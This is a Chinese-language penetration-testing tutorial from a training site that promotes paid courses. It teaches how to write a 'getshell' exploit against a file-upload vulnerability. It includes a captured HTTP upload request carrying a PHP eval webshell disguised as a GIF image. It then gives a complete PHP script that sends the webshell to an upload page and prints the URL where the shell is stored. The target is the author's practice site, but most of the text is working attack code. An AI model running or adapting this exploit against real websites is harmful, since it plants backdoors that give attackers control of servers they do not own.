[原创]WEB安全第七章exp编写篇04 getshell exp编写
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
getshell 通常是指通过某种命令或者上传漏洞得到网站的权限或服务器权限,在WEB安全里多为上传漏洞,上传木马(getwebshell)
访问暗月靶机系统,漏洞上传测试。
http://www.moontester.com/upload.php
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/uploads/2019/11/image001-8-1024x566.jpg)
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/uploads/2019/11/image002-8.jpg)
上传漏洞测试,可以直接上传图片木马,使用burpsuite抓包
POST /upload.php HTTP/1.1
Host: www.moontester.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.moontester.com/upload.php
Content-Type: multipart/form-data; boundary=—————————11819270641735
Content-Length: 311
Connection: close
Cookie: PHPSESSID=4f6vnfrh0pkiedfdkf5uap6po5
Upgrade-Insecure-Requests: 1
—————————–11819270641735
Content-Disposition: form-data; name=”file”; filename=”1.php”
Content-Type: image/gif
<?php eval($_POST[‘cmd’]);?>
—————————–11819270641735
Content-Disposition: form-data; name=”sub”
ä¸ä¼
—————————–11819270641735–
用Wireshark抓的包 这种包才是最原始的包
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/uploads/2019/11/image003-33-1024x443.png)
使用php编写gethslell 需要用到sockets扩展 确保php.ini 开启socket
[php]
<?php
function http_send($host, $packet){
$sock = fsockopen($host, 80);
if(!$sock){
print "\n[-] No response from {$host}:80 Trying again…";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) {
$resp .= fread($sock, 1024);
}
fclose($sock);
return $resp;
}
?>
[/php]
这段代码是模拟http发包,成功后会返回页面内容。
[php]
<?php
function data($host,$filename){
$payload = "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name="file"; filename="{$filename}"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= ‘GIF89a’."\r\n".'<?php eval($_POST[a]) ?>’."\r\n";
$payload .= "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name="sub"";
$payload .="\r\n\r\n";
$payload .="12132\r\n";
$payload .="—————————–86531354118821–\r\n";
$packet = "POST /upload.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=—————————86531354118821\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
return $packet;
}
?>
[/php]
这个部分是模拟http包,—————————–86531354118821– 这个部分是提交匹配的代码。
$payload .= ‘GIF89a’.”\r\n”.”.”\r\n”;
这部分是你要上传的图片木马内容
完整的代码
[php]
<?php
function http_send($host, $packet){
$sock = fsockopen($host, 80);
if(!$sock){
print "\n[-] No response from {$host}:80 Trying again…";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) {
$resp .= fread($sock, 1024);
}
fclose($sock);
return $resp;
}
function data($host,$filename){
$payload = "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’file’; filename='{$filename}’\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= ‘GIF89a’."\r\n".'<?php eval($_POST[a]) ?>’."\r\n";
$payload .= "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’sub’";
$payload .="\r\n\r\n";
$payload .="12132\r\n";
$payload .="—————————–86531354118821–\r\n";
$packet = "POST /upload.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=—————————86531354118821\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
return $packet;
}
$filename = "moon.php";
$host = "www.moontester.com";
print http_send($host,data($host,$filename));
[/php]
文件名
$filename = “moon.php”;
网址
$host = “www.moontester.com”;
输出上传后得内容
print http_send($host,data($host,$filename));
运行 得到如图
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/uploads/2019/11/image004-26.png)
cmd返回信息,有很多内容 并不是想要的,所以要进行WEBSHELL的路径进行截取。返回所需的内容。完整的exp如下
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/uploads/2019/11/image005-14.png)
[php]
<?php
function http_send($host, $packet){
$sock = fsockopen($host, 80);
if(!$sock){
print "\n[-] No response from {$host}:80 Trying again…";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) {
$resp .= fread($sock, 1024);
}
fclose($sock);
return $resp;
}
function data($host,$filename){
$payload = "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’file’; filename='{$filename}’\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= ‘GIF89a’."\r\n".'<?php eval($_POST[a]) ?>’."\r\n";
$payload .= "—————————–86531354118821\r\n";
$payload .= "Content-Disposition: form-data; name=’sub’";
$payload .="\r\n\r\n";
$payload .="12132\r\n";
$payload .="—————————–86531354118821–\r\n";
$packet = "POST /upload.php HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=—————————86531354118821\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
return $packet;
}
$filename = "moon.php";
$host = "www.moontester.com";
$html_str = http_send($host,data($host,$filename));
preg_match("/Stored in: (.*?)</", $html_str,$m);
if ($m[1]){
echo "http://".$host."/".$m[1];
}else{
echo "flase";
}
[/php]
preg_match 这个是php里面的正则用来匹配 或 过滤内容的。
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/uploads/2019/11/image005-15.png)
最好就会得到http://www.moontester.com/upload/4a2246d3a2fb16824a51d5e789ad553bmoon.php
![[原创]WEB安全第七章exp编写篇04 getshell exp编写](https://www.moonsec.com/wp-content/uploads/2019/11/image006-9-1024x578.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/546.html
mOon 